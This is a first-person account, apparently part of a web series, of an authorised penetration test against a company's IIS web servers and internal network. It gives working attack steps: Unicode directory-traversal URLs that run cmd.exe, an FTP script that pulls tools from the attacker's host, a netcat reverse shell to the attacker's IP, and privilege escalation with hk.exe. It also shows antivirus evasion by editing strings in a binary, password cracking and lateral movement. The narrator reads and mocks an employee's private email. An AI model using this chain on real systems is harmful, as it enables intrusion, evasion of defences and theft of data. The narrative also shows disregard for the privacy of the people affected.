So I start with the beginning, making DNS lookups on their IP classes, whois requests and port scan the IP addresses of the company's main website as well as the subsidiaries websites. It turns out that there are over 140 machines publicly exposed to the Internet (web servers, DNS, mail, B2B), mostly Windows NT machines, with a couple *nix in the lot. A quick header scan of the web servers show effectively a mix of IIS 3.0 and 4.0. Now, the problem is to figure out where to start. Let's start with the obvious, the main website (NT 4.0 IIS 4.0). A quick check at the Bugtraq archive at SecurityFocus shows me that the "Directory traversal using Unicode vulnerability" is still quite popular (especially by script kiddies who uses it to perform website defacements), even if it's been out for about a year already. Especially since there is a new variation every couple of weeks or so. So I fire up my specially crafted hacking tool, MS Internet Explorer (sarcasm directed at medias covering hacking incidents). Basically, if you know how to browse the web, you know how to hack a IIS server.

The directory traversal vulnerability works by fooling the web server to give you content located outside of the web directory that it is supposed to be limited to. By default (which must cover anything between 50%-90% of the installed base), the content served by the server is located at C:\Inetpub\wwwroot. So, instead of requesting the document http://www.victim.com/index.html (that correspond physically on the server to the file C:\Inetpub\wwwroot\index.html), you request something like http://www.victim.com/../../index.html, which will request the file C:\index.html. Of course, index.html doesn't exist on C:\, but that doesn't matter, since from there you can request any file that you know the location of, based on a default install. Things that come to mind is the cmd.exe program, that you can use to issue commands on the web server as if you were sitting there and typing in a DOS box. I have to say at this point that the vulnerability doesn't work like I said, but that was a simple explanation of how it acctually work. To exploit this, you need rights to execute code,and you have to change the /../.. with the Unicode equivalent. So instead of requesting cmd.exe from C:\Inetpub\wwwroot, we'll do it from C:\Inetpub\wwwroot\scripts, which then requires another layer of /.. . As for Unicode, let's just say that it is simply a computer code a bit similar to the ASCII code that Windows NT uses. We use it to translate some of the ../, because IIS will filter your request out otherwise. So, if I want to do a "dir c: /s" command on the server, that means that I have to request /scripts/../../../winnt/system32/command/cmd.exe with dir c: /s as a parameter. We launch this command by typing the following in your browser and pressing [Enter]:


http://www.victim.com/..%1c%pc../win...?/c+dir+c:\+/s

Notice that + replaces the [Space] character in your commands, and ?/c+ is required to pass parameters to cmd.exe. %1c%pc is the Unicode equivalent to /.. (other equivalents may work, see the Bugtraq entry about this vulnerability for more details). So now we have in our browser window a complete listing of all files present on the C: drive of the server. We can do the same thing for the D: drive, to see if it's present, and if it is, do it for the E: drive, and so on. The idea is to gather up as much information about the machine as we can get. At this point, we know enough to see what software runs on the machine, where the data is located. Notice that at this point, we could start to issue ping commands or net commands to try to map to any internal network the server may be talking to, but issuing these commands with the web browser is not really convenient. So we're going to get a real command prompt.

First, I set up a FTP server (no anonymous access, of course) on my laptop and put my tools in the main FTP folder. Namely, I put nc.exe and hk.exe and a couple from the ressource kit. Then I use the FTP utility conviniently waiting where I expect it to be for me to initate a connection to my laptop and fetch my tools. Since the FTP program is interactive and that I can only issue commands via the web server, I have to make a FTP script on the server. To do this, I simply issue echo commands redirected to a text file, using the directory traversal vulnerability.


http://www.victim.com/..%1c%pc../win....intruder.com+>>ftp.txt
http://www.victim.com/..%1c%pc../win...+echo+username>>ftp.txt
http://www.victim.com/..%1c%pc../win...+echo+password>>ftp.txt
http://www.victim.com/..%1c%pc../win.../c+echo+prompt>>ftp.txt
http://www.victim.com/..%1c%pc../win...xe?/c+echo+bin>>ftp.txt
http://www.victim.com/..%1c%pc../win...cho+mget+*.exe>>ftp.txt
http://www.victim.com/..%1c%pc../win...xe?/c+echo+bye>>ftp.txt

I check out my script with my web browser one last time to make sure there I made no mistake, and then I launch the FTP session, assuming that the firewall permits this kind of traffic. And it does.


http://www.victim.com/..%1c%pc../win...ftp+-s:ftp.txt

Once this is done, I will use netcat to have a command prompt on the webserver. Netcat is a very useful networking tool that you can use to communicate via any port, and spawn a shell prompt. nc -h will give you these options:


C:\nc11nt>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

So I will launch netcat in listening mode on port 53 (also used by DNS, allowed by the firewall) on my laptop, and launch a netcat connection bound to a command prompt from the webserver to my laptop (using the brwoser once again).
In my DOS box


nc -l -p 53

and it hangs there...


http://www.victim.com/..%1c%pc../win...ddress.ADSL+53

And the hung DOS box gets:


Microsoft(R) Windows NT(TM)
(C)Copyright 1985-1996 Microsoft Corp.

C:\Intetpub\wwwroot\scripts>_

Voilą, I have a prompt. I use the whoami command from the NT Ressource kit, to find out with disappointment that I am only INET_IUSR/Anonymous, the anonymous Internet user account. So the web server doesn't run on the Administrator account. That means that I still can't reach the NT password file (also called the SAM database) because of the restricted access. No problem, I think, I'll just initiate another telnet connection using another port (23 Telnet, why not?) by using the hk.exe tool. This tool uses a vulnerability involving an undocumented API call (NT_Impersonate_thread or something like that) that lets a thread (a part of a process running in memory) get the token (a security attribute that defines what security level a thread can run, user space or kernel space) of a kernel thread (LSASS or equivalent). To use this tool, you simply type hk followed by any command you would want to run if you had NT AUTHORITY/SYSTEM level privileges (this is above the Administrator account privileges). So I type


hk nc -d -e cmd.exe my.IP.address.ADSL 23
Bad command or file name

What the?!? I make a dir command, and true enough I don't see any file named hk.exe. Did I forget to download it before? I make another FTP download (using the script again because interactive FTP sessions over a netcat connection doesn't work too well), and sure enough I see the file being downloaded from my laptop. I make a dir command again, and the file still isn't there. So I go to C:\ and make a dir hk.exe /s, and what do you know? It's in the C:\Program Files\Antivyrtec Associates\Antivirus\Quarantine\ folder. Damn, the stupid antivirus caught my file. How can I get root without it?

Most antivirus products work by matching byte streams of known viruses and other malware to the programs and files your computer uses. If a match is found, then the file is most probably of dangerous nature, and the antivirus prevents the user from opening it. Ploymorphic viruses uses a flaw in this strategy by modifying themselves every time, making it difficult to identify a reliable byte stream in the virus code that can be used to clearly identify it. Can I also use this flaw to my advantadge? Of course. Actually, that day, I have lost a lot of respect towards antivirus products seeing how easily it was to circumvent it.

Using a hex editor (I don't remember which one, but ther all do pretty much the same), I opened hk.exe. What I now see is all the binary code of the executable, shown in an hexadecimal representation. On the right hand side, we see an ASCII representation of each byte of code. Since this is compiled code, it is pretty hard to modify anything in there without screwing up the program and making it useless. Especially since we don't know what bit pattern the antivirus software looks for, and that I know nothing in reverse-engineering. The only thing editable in the program is a small section where we can actually read the message displayed by hk.exe when it successfully executes (something like "Your wish is my command, master"). What the heck, let's change that and see what happens. So I replace the string with XXXX XXXX XX XX XXXXXXXX XXXXXX, and rename the file hk2.exe (which is why I don't remember the exact string, now I only care to use hk2.exe). A quick FTP download later, and I make a dir command to see if it's detected. The file is waiting there where I put it, undetected from the antivirus product. I was ashamed of that antivirus company, that will remain nameless. In the marketing hype, they all state that they scan for streams of bytes in the files it scanned, but it turns out that they actually scan for streams of TEXT. That was a big desilusion for me. I think I can write a better virus scanner in Perl than the big behemoths of software antivirus are these days.

So anyway, I open another DOS box on my machine and I initiate a new listening connection on my laptop


nc -l -p 23

and I type the command


hk2 nc -d -e cmd.exe my.IP.address.ADSL 23

on the active netcat on the webserver and we get:


hk2 nc -d -e cmd.exe my.IP.address.ADSL 23

lsass pid & tid are: 50 - 53

Launching line was: nc -d -e cmd.exe my.IP.address.ADSL 23

XXXX XXXX XX XX XXXXXXXX XXXXXXNtImpersonateClientOfPort suceeded

(On the listening DOS box)


Microsoft(R) Windows NT(TM)
(C)Copyright 1985-1996 Microsoft Corp.

C:\Intetpub\wwwroot\scripts>

whoami
NT AUTHORITY/SYSTEM

At this point, I see no reason to keep the first netcat connection, so I kill it. I am now in complete control of the web server and I can do whatever I want on it. I start to upload the SAM database on my laptop and I start cracking it with l0phtcrack, using a dictionnary attack first, then a brute force attack to uncover the few passwords left, if any. While the passwords cracks, I continue my investigations of my newly owned machine. I issue the ipconfig command, and I see the IP addresses of the two network interface cards installed on the machine. The IP address on one of the NIC is effectively the public IP of the web server. The other one bears an internal IP address, and a few pings and net commands later, I have a complete list of the NT Domains, PDC, BDC, Servers. I could talk to the whole internal network! Using some of the usernames/passwords that I cracked, I could go in any domain and from there connect to any workstation. With net accounts, I saw some administrative accounts that I have guessed the password (backup/backup, admin/admin, test/1234 for example). Seeing my progress, a colleague offered to try to get inside from the website of a subsidairy, while I continue my exploration via the main one. Using the same techniques described above, he got inside the internal network of the branch. But from where I was, I could tell that I had access to his part of the network, but also to the other subsidiaries, while he would have to go up to where I was before reaching to others. So we ended there the second intrusion right there as we were already in the City of Gold.

As I hopped from one workstation to another, from server to server, I kept making dir c: and dir d: images, downloaded files in various interesting folders (marketing, HR, finance, IT, production, contracts, budget, etc), along with a couple Outlook mailboxes, which tells me that I could probably use the flaws in this software to send a custom virus to take control of a machine, but why bother? I already had access to everything: network maps, list of software approved by IT, standard configuration of a desktop, resumes from applicants, budget of last and current year of various departments, production status reports, finance reports, company acquisition plans and contracts, full employee lists, with phone number, e-mails and salaries, layoff severance documents, full calendar appointments of some management people, along with their mailboxes, which also showed up some interesting things. I will always remember this e-mail I read that the guy I hacked into received from one of his friends. In the e-mail, the friend tells to my victim all the good times he had while on vacation in Spain, and how he loved doing that venezuelian prostitute who apparently had **** to remember for a lifetime. And in the next paragraph, he invites my victim to his own wedding in the upcoming months, with his girlfriend that he apparently loves very very much. Sometimes, human nature makes me wonder...

We were about to run out of time, since my three days were almost run out. Let's not forget that I had to write a report after that, and that the customer only paid for such amount of time. But there was still a little piece of the network that I couldn't get access to. It was refusing any connection attempt from any domain that I already had control of. That was a separate NT domain, on its own IP class C network, with very restricted access, probably accessed only by the board of directors if I rely on the domain name. No password that proved useful before would work. A port scan showed me that there was a web server on this network, and I knew it was a NT server, and most probably running IIS 4 as well. But how can I launch a web request from a DOS prompt in order to hack the server like I did the first one? I could probably make a tool someday, but I definetely don't have this kind of time on my hands right now. I see the gold, I want the gold (even though I have plenty already), and I am willing to take a big risk of being discovered in reason of the time of the day (around 10:00 AM) to get it. I will initiate a Winvnc connection.

Winvnc works a bit like nc, but instead of giving a simple command prompt, it give full access to the graphical user interface (GUI) as if you were sitting in front of the machine, the same way as PCAnywhere does. This have the side effect that a person sitting in front of the machine will see all your actions, which means that you have been spotted.

In my case, I had nothing to lose, so the plan is to download Winvmc on the machine I currently own, initiate the GUI connection from there, and then use the browser installed on the web server to launch a similar attack to the intranet server using the directory traversal vulnerability. From there, I hope to be able to find some usernames and passwords that I can use to gain access to the protected machines in the same fashion as to what I had done so far. So I initiate the Winvnc session, and surprise, I see right in the middle of the screen two pop-up warnings from the antivirus software, generated from the two unsuccessful downloads of hk.exe, 2 days ago. So I click OK to remove any visual evidence of my presence, and I proceed to clean my presence a bit, deleting all the stuff that I won't need anymore. I also notice some of the NT Res kit that I used in another folder that was not mine. That made me wonder if it was the admin who conveniently installed it there for anyone to use, of if it was the belonging of another intruder. Who knows?

I was about to launch IE in order to finish my attack quickly and return to the stealthier DOS command prompt that a second surprise happens: Notepad opens up with a message saying "who r u?". I knew I could be spotted, and I have been spotted. The spelling of the message makes me wonder if I am dealing with a IT professional or a script kiddie here, but a quick look at the processes running on the machine (ps.exe from the NT Res Kit) shows me that he is connected via a PCAnywhere session, so it's probably a tech support, but he's not in front of the machine. So I write "God" in the notepad message, give him about 5 seconds to read my reply, and then I kill his connection (kill.exe). Then I quickly erased the rest of my files on the machine, and killed my session while I was laughing hard with a colleague beside me.

Too bad that I missed that last vault, and that I have been spotted, but if I wasn't only a guy doing his job, working 9-5 because I also have a life, and under an artificial schedule, I would have cracked it, undetected. A dedicated corporate spy or malicious hacker would have done this at night, and would have been completely undetected for as long as he wants.

2. Technical background of the hack
4. The second victim

Table of contents
http://iquebec.*******.com/securit/w...pers/aut3.html